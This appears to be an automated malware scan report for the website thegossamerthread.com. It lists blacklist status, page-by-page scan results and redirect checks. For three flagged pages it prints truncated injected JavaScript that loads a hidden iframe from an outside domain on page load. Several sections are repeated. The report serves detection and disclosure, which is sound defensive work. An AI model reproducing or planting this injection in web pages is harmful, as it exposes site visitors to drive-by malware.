Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thegossamerthread.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thegossamerthread.com/ | 200 OK Content-Length: 49383 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://thegossamerthread.com/plugins/system/jcemediabox/js/jcemediabox.js?v=1017 | 200 OK Content-Length: 43393 Content-Type: application/javascript | clean |
http://thegossamerthread.com/plugins/system/jcemediabox/js/mediaobject.js?v=1017 | 200 OK Content-Length: 3119 Content-Type: application/javascript | clean |
http://thegossamerthread.com/plugins/system/jcemediabox/addons/default.js?v=1017 | 200 OK Content-Length: 1814 Content-Type: application/javascript | clean |
http://thegossamerthread.com/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://thegossamerthread.com/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://thegossamerthread.com/media/system/js/caption.js | 200 OK Content-Length: 800 Content-Type: application/javascript | clean |
http://thegossamerthread.com/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://thegossamerthread.com/media/system/js/validate.js | 200 OK Content-Length: 2742 Content-Type: application/javascript | clean |
http://thegossamerthread.com/modules/mod_1901contact/mod_1901contact.js | 200 OK Content-Length: 118 Content-Type: application/javascript | clean |
http://thegossamerthread.com/templates/beez_20/javascript/jquery-1.6.2.min.js | 200 OK Content-Length: 91556 Content-Type: application/javascript | clean |
http://thegossamerthread.com/templates/beez_20/javascript/md_stylechanger.js | 200 OK Content-Length: 3117 Content-Type: application/javascript | clean |
http://thegossamerthread.com/?tmpl=component&print=1&page= | 200 OK Content-Length: 3307 Content-Type: text/html | clean |
http://thegossamerthread.com/14-gossamer-thread-articles | 200 OK Content-Length: 111977 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://thegossamerthread.com/thankyou | 200 OK Content-Length: 48007 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thegossamerthread.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sun, 18 Jan 2015 21:36:18 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d2f67d518d959cb1aa0f22a4b2d239fa=ab9771b3bdbd53533bfa98bf16f7bcd0; path=/
X-Powered-By: PHP/5.3.15
GET / HTTP/1.1
Host: thegossamerthread.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sun, 18 Jan 2015 21:36:18 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d2f67d518d959cb1aa0f22a4b2d239fa=ab9771b3bdbd53533bfa98bf16f7bcd0; path=/
X-Powered-By: PHP/5.3.15
Second query (visit from search engine):
GET / HTTP/1.1
Host: thegossamerthread.com
Referer: http://www.google.com/search?q=thegossamerthread.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thegossamerthread.com
Referer: http://www.google.com/search?q=thegossamerthread.com
Result:
The result is similar to the first query. There are no suspicious redirects found.